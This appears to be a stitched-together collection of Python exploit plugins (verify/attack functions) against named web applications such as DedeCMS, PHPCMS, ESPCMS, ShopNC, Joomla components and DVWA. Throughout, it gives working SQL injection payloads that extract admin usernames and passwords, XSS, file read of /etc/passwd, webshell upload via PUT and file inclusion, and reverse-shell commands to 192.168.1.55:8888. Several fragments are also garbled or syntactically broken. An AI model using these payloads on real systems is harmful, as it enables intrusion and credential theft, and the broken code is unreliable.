#构造XSS验证的payload
payload = '"><script>alert(/' + strxss + '/)</script>'
#漏洞访问地址
exploit = '/index.php?option=com_carman&msg='
#自定义的HTTP头
httphead = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive',
"Content-Type": "application/x-www-form-urlencoded"
}
#构造访问地址
vulurl = self.url + exploit + payload
#访问
resp = req.get(url=vulurl, headers=httphead, timeout=50)
#判断返回结果
if resp.status_code == 200 and '<script>alert(/' + strxss + '/)</script>' in resp.content:
#漏洞验证成功
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url + exploit
result['VerifyInfo']['Payload'] = payload
return self.parse_output(result)
def _verify(self):
#利用注入漏洞计算md5(3.1415)
result = {}
#利用的payload(利用的是floor回显报错的方式)
payload = ("1 AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT"
"(md5(3.1415),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA"
".CHARACTER_SETS GROUP BY x)a) -- -")
#漏洞页面
exploit = '/index.php?option=com_hdflvplayer&id='
#构造访问地址
vulurl = self.url + exploit + payload
#自定义的HTTP
httphead = {
'User-Agent':
'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Connection': 'keep-alive'
}
#尝试访问
resp = req.get(url=vulurl, headers=httphead, timeout=50)
#检查是否含有特征字符串(md5(3.1415)=63e1f04640e83605c1d177544a5a0488)
if '63e1f04640e83605c1d177544a5a0488' in resp.content:
#漏洞验证成功
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url + exploit
result['VerifyInfo']['Payload'] = payload
return self.parse_output(result)
def _attack(self):
result = {}
sessionid = self.common()
if sessionid:
token = hashlib.new('md5', randomStr()).hexdigest()
payload = '<script>alert("%s")</script>' % token
req.get(self.url + "/escform.esp?sessionid=" + sessionid + "&formid=131&opmsg=" + payload).content
response = req.get(self.url + "/escmenu.esp?sessionid=" + sessionid + "&menuid=257").content
if token in response:
result['VerifyInfo'] = {}
result['XSSInfo'] = {}
result['VerifyInfo']['URL'] = self.url
result['XSSInfo']['Payload'] = payload
response = req.get(self.url + "/escmenu.esp?sessionid=" + sessionid + "&menuid=259").content #ɾ³ýÏûÏ¢
response = req.get(self.url + "/escmenu.esp?sessionid=" + sessionid + "&menuid=11").content #Í˳öµÇ¼
return self.parse_result(result)
def _verify(self):
result = {}
vul_url = '%s/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://?' % self.url
res = req.get(vul_url)
if 'Baiduspider' in res.content and 'Googlebot': in res.content
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
def _verify(self, verify=True):
result = {}
sessionid = self.common()
if sessionid:
response = req.get(self.url + "/escmenu.esp?sessionid=" + sessionid + "&menuid=268").content
title = re.search("<TH align=left>(ESC \d+ [\s\S]+?)</TH>" , response).group(1)
contents = re.findall("<TH align=left>([a-zA-Z ]+?)</TH><TD>([\s\S]+?)</TD>" , response)
counter = len(contents)
print title , '\n'
for tmp_counter in range(counter):
print contents[tmp_counter][0] , ':' , contents[tmp_counter][1]
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
response = req.get(self.url + "/escmenu.esp?sessionid=" + sessionid + "&menuid=11").content #Í˳öµÇ¼
return self.parse_result(result)
def _verify(self):
result = {}
target = self.url + "plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=a"
response = req.get(target)
content = response.content
if 'DedeCMS Error Warning!' in content:
result = {'VerifyInfo':{}}
result['VerifyInfo']['URL'] = self.url
return self.parse_result(result)
def _verify(self):
result = {}
payload = "/index.php?ID=1 UNION SELECT 1,md5(666),3,4,5,6,7,8--"
verify_url = self.url + payload
content = req.get(verify_url).content
if 'fae0b27c451c728867a567e8c1bb4e53' in content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = verify_url
return self.parse_verify(result)
def _verify(self):
result = {}
target = self.url + "plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=a"
response = req.get(target)
content = response.content
if 'DedeCMS Error Warning!' in content:
result = {'VerifyInfo': {}}
result['VerifyInfo']['URL'] = self.url
return self.parse_result(result)
def _verify(self, verify=True):
result = {}
vul_url = "%s/install/index.php.bak" % self.url
response = req.get(vul_url)
if response.status_code == 200:
result["VerifyInfo"] = {}
result["VerifyInfo"]["URL"] = self.url
return self.parse_attack(result)
def _verify(self):
result = {}
head = {
'referer':self.url
}
respon = req.get(self.url, headers=head, timeout=10)
if respon.status_code == 200 and 'PHP Version' in respon.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def _verify(self):
result = {}
target = self.url + "plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"
response = req.get(target)
content = response.content
regex = re.compile('<h2>.*?\|(.*?)</h2>')
data = regex.search(content)
if data != None:
result = {'VerifyInfo':{}}
result['VerifyInfo']['URL'] = self.url
return self.parse_result(result)
def _verify(self):
result = {}
target = self.url + "/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=120&arrs2[]=117&arrs2[]=97&arrs2[]=110&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35"
response = req.get(target)
content = response.content
if content.find('Safe Alert: Request Error step 2!') > 0:
result = {'VerifyInfo':{}}
result['VerifyInfo']['URL'] = self.url
result['VerifyInfo']['username'] = '******'
result['VerifyInfo']['password'] = '******'
return self.parse_result(result)
def _verify(self):
result = {}
#Write your code here
vul_url='%s/blog-by-cat' % self.url
verify_url=vul_url+'/-1 union select 1,2,3,4,md5(1),6,7,8'
resp=req.get(verify_url)
if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
result['VerifyInfo']={}
result['VerifyInfo']['URL']=vul_url
result['VerifyInfo']['Payload']=verify_url
return self.parse_output(result)
def _verify(self):
result = {}
result['VerifyInfo'] = {}
arr = urlparse.urlparse(self.url)
vulurl = '%s://%s/' % (arr.scheme,arr.netloc)
payload = 'resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd'
url = self.url + payload
res_exp = req.get(url)
if res_exp.status_code == 200 and '/bin/bash' in res_exp.content:
result['VerifyInfo']['URL'] = self.url + payload
return self.parse_attack(result)
def _verify(self):
if self.check_argv():
result = {}
payload = "?archive=citylist&action=citylist&parentid=-1 UNION select 1,2,concat(floor(rand(0)*2),md5(1)),4,5"
vulurl = urlparse.urljoin(self.url,'adminsoft/index.php' + payload)
resp = req.get(vulurl)
if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = urlparse.urljoin(self.url,'adminsoft/index.php')
result['VerifyInfo']['Payload'] = payload
return self.parse_attack(result)
def _verify(self):
target_url = '/.git/config'
response = req.get(self.url + target_url, timeout=10, verify=False)
content = response.content
if '[remote "origin"]' in content:
result = {}
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url + target_url
else:
result = {}
return self.parse_attack(result)
def _verify(self):
result = {}
vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"
head = {
'Referer': payload
}
resp = req.get(vulurl, headers=head)
if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vulurl
result['VerifyInfo']['Payload'] = payload
return self.parse_attack(result)
def _verify(self):
result = {}
target = self.url + "/plus/guestbook.php"
response = req.get(target)
content = response.content
soup = BeautifulSoup(content, 'lxml')
msgid = None
for line in soup.findAll('a'):
if line.get('href').startswith('guestbook.php?action=admin'):
msgid = line.get('href')[30:]
break
if msgid == None:
print "No msgid find,don't f**k this vulu"
payload = self.url + "/plus/guestbook.php?action=admin&job=editok&id={0}&msg=',msg=user(),email='".format(msgid)
req.get(target)
target = self.url + "/plus/guestbook.php"
response = req.get(target)
content = response.content
for line in soup.findAll('td', attrs={'class':'msgtd'}):
if line.text.find('@localhost') >= 0:
result = {'VerifyInfo':{}}
result['VerifyInfo']['URL'] = self.url
return self.parse_result(result)
def _attack(self):
if self.check_argv():
result = {}
payload = "?archive=citylist&action=citylist&parentid=-1 UNION select 1,2,concat(char(45,45,45),name,char(45,45,45),password,char(45,45,45)),4,5 FROM espcms_v6.espcms_admin_member"
vulurl = urlparse.urljoin(self.url,'adminsoft/index.php' + payload)
resp = req.get(vulurl)
if resp.status_code == 200:
# 匹配账户密码
match_result = re.search(r'---(.+)---(.+)---',resp.content,re.I | re.M)
if match_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = match_result.group(1)
result['AdminInfo']['Password'] = match_result.group(2)
return self.parse_attack(result)
def _verify(self):
result = {}
payload = "?param=admin|(select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),md5(1))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)"
vulurl = urlparse.urljoin(self.url,'index.php/api/count/index' + payload)
head = {
'Referer':'http://www.baidu.com'
}
resp = req.get(vulurl,headers=head)
# 返回的是500状态码而不是一般的200
if resp.status_code == 500 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = urlparse.urljoin(self.url,'index.php/api/count/index')
result['VerifyInfo']['Payload'] = payload
return self.parse_output(result)
def _verify(self):
result = {}
# 定义地址
vul_url = urlparse.urljoin(self.url, '/index.php?r=me/setBasic')
logout_url = urlparse.urljoin(self.url, '/index.php?r=u/logout')
login_url = urlparse.urljoin(self.url, '/index.php?r=u/login')
admin_url = urlparse.urljoin(self.url, '/index.php?r=admin/setting/site')
# 提升管理员权限Payload
payload = "UserInfo%5Bname%5D=dubuqingfeng&UserInfo%5Bbio%5D=test&UserInfo%5Bintroduction%5D=&UserInfo%5BIsAdmin%5D=0&yt0="
headers = {"Content-Type": "application/x-www-form-urlencoded"}
email = raw_input("Email: ")
password = getpass.getpass('password:'******'<a href="/index.php?r=admin">后台管理</a>')
if find_result != -1:
# 获取cookie
cookies = admin_result.cookies
# 发送post请求
get_shell_result = req.post(admin_url, cookies=cookies, headers=headers)
print cookies
print get_shell_result.content
print get_shell_result.cookies
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Postdata'] = payload
return self.parse_attack(result)
def _attack(self):
result = {}
vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#"
head = {
'Referer': payload
}
resp = req.get(vulurl, headers=head)
if resp.status_code == 200:
match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', resp.content, re.I | re.M)
if match_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = match_result.group(1)
result['AdminInfo']['Password'] = match_result.group(2)
return self.parse_attack(result)
def _attack(self):
result = {}
payload = "?param=admin|(select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(select/**/concat(char(45,45),adminname,char(45,45,45),adminpass,char(45,45))/**/from/**/v4_admin/**/limit/**/1))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)"
vulurl = urlparse.urljoin(self.url,'index.php/api/count/index' + payload)
head = {
'Referer':'http://www.baidu.com'
}
resp = req.get(vulurl,headers=head)
# 返回的是500状态码而不是一般的200
if resp.status_code == 500:
match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key',resp.content,re.I | re.M)
if match_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = match_result.group(1)
result['AdminInfo']['Password'] = match_result.group(2)
return self.parse_output(result)
def _verify( self ):
result = {}
username = '******' # 登陆账号
password = '******' # 登陆密码
htmlTXT = req.get(self.url + "/login.php")
Content = pq(htmlTXT.text)
tokenStr = Content("input")
Token = tokenStr[3].value # 获取Token
_cookies = htmlTXT.cookies.get_dict() # 获取Cookies
# 改写模式为简单
_cookies['security'] = 'low'
payload = {'username': username, 'password': password, 'user_token': Token, 'Login': '******'}
response = req.post(self.url + "/login.php", data=payload, cookies=_cookies)
# 生成随机md5字符做为验证
rand_num = random.randint(0, 1000)
md5 = hashlib.md5()
md5.update(str(rand_num))
m = md5.hexdigest()
# 验证命令注入是否存在
payload = {'ip': '127.0.0.1;echo "<p>' + str(m) + '</p><br/>"', 'Submit': 'Submit'}
response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)
htmlText = pq(response.text)
tag = htmlText('pre p').html()
if tag == str(m):
# 反射shell 提前开启nc
# 方法一 bash Shell
payload = {'ip': '127.0.0.1;bash -i >& /dev/tcp/192.168.1.55/8888 0>&1"', 'Submit': 'Submit'}
response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)
# 方法二 new bash Code
# payload = {'ip': '127.0.0.1;echo "#\!/bin/bash\n\nbash -i >& /dev/tcp/192.168.1.55/8888 0>&1">shell.sh && ./shell.sh', 'Submit': 'Submit'}
# response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)
# 方法三 Python Shell 貌似这方法只适合手动跑
# payload = {
# 'ip' : '127.0.0.1;python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'192.168.1.55\',8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\']);"&',
# 'Submit': 'Submit'}
# response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies)
result['extra'] = {}
result['extra']['Shell'] = "OK! Open 'NC -lvv 8888' "
return self.parse_output(result)
def _verify(self):
'''verify mode'''
result = {}
a = random.randint(100000, 900000)
b = random.randint(100000, 900000)
body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%out.println({0}+{1});%>''' .format(str(a),str(b))
url = self.url
resp = req.options(url+'/asda',timeout=10)
if 'allow' in resp.headers and resp.headers['allow'].find('PUT') > 0:
shell_url = url + "/" + str(int(time.time())) +'.jsp/'
resp1=req.put(shell_url,body)
print resp1.status_code
resp2=req.get(shell_url[:-1])
c = a + b
if resp1.status_code == 201 and str(c) in resp2.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
return self.parse_output(result)
def _verify(self):
result = {}
url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')
payload = "exp&true_name[]=1,1,1,1,md5(0x2333333),1,1,1) -- a"
values = list()
values.append("form_submit=ok&id=&true_name[]=")
values.append(payload)
values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123")
post_data = "".join(values)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
req.post(vul_url, data=post_data, headers=headers)
res = req.get(url)
if res.status_code == 200 and '525c6bd8bbf951e6863256456f328265' in res.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
result['VerifyInfo']['Payload'] = payload
return self.parse_attack(result)
def _attack(self):
result = {}
url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address')
vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1')
payload = "exp&true_name[]=1,1,1,concat(0x7e,(SELECT admin_name FROM shopnc_admin limit 0,1)),concat(0x7e,(SELECT admin_password FROM shopnc_admin limit 0,1)),1,1,1) -- a"
values = list()
values.append("form_submit=ok&id=&true_name[]=")
values.append(payload)
values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123")
post_data = "".join(values)
headers = {"Content-Type": "application/x-www-form-urlencoded"}
req.post(vul_url, data=post_data, headers=headers)
res = req.get(url)
if res.status_code == 200:
match_result = re.findall(r'~\w*', res.content, re.I | re.M)
if match_result:
result['AdminInfo'] = {}
result['AdminInfo']['Username'] = match_result[0][1:]
result['AdminInfo']['Password'] = match_result[1][1:]
return self.parse_attack(result)
def _verify(self):
if self.check_argv():
result = {}
# 设置header里的Content-Type,表明需要上传文件
self.headers['Content-Type'] = "multipart/form-data; boundary=----WebKitFormBoundaryMOKvckE0g6qr7jKz"
# 文件名为testjpg.jpg,内容为<?php echo md5(0x2333333);unlink(__FILE__); ?>
post_data = "------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"files\"; filename=\"testjpg.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php echo md5(0x2333333);unlink(__FILE__); ?>\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n \r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picWidth\"\r\n\r\n142\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picHeight\"\r\n\r\n102\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"waterImg\"\r\n\r\n0\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz--\r\n\r\n"
# 上传地址,这个是正常功能
post_url = urlparse.urljoin(self.url,'index.php?ac=common_upfile&type=')
resp = req.post(url=post_url,data=post_data)
# 从返回的内容中提取上传图片的文件名
if resp.status_code == 200:
match_result = re.search(r'value =\'(.*?)\'',resp.content,re.I | re.M)
if match_result:
# 访问本地文件包含地址
payload = "../../uploadfiles/" + match_result.group(1) + "%00"
vul_url = urlparse.urljoin(self.url,"index.php?d=" + payload)
resp = req.get(vul_url)
if resp.status_code == 200 and '5a8adb32edd60e0cfb459cfb38093755' in resp.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = vul_url
return self.parse_attack(result)
def _attack(self):
response = req.get(self.url, headers={"referer": self.url}, timeout=10)
return self.parse_attack(response)
def _verity(self):
result = {}
vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')
payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"
resp = req.get(vulurl, headers=head)
pass
